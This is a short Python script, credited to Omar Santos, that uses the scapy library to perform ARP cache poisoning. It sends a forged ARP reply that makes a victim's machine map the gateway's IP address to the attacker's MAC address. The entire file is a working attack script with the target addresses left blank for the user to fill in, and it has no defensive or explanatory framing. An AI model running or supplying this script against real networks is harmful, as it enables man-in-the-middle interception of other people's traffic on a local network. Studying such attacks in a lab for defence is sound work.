from scapy.all import * # Author: Omar Santos # Perform ARP cache poisoning def perform_arpcache_poisoning(victim_ip, gateway_ip): """ Performs ARP cache poisoning by sending a crafted ARP packet to associate the gateway IP-MAC mapping with the victim IP. :param victim_ip: IP address of the victim device whose ARP cache will be poisoned. :param gateway_ip: IP address of the legitimate gateway device whose IP-MAC mapping will be spoofed. """ # Construct the ARP packet packet = ARP(op=2, pdst=victim_ip, hwdst=getmacbyip(victim_ip), psrc=gateway_ip) # Send the ARP packet send(packet, verbose=0) # Specify the victim IP and gateway IP victim_ip = "" gateway_ip = "" # Perform ARP cache poisoning perform_arpcache_poisoning(victim_ip, gateway_ip)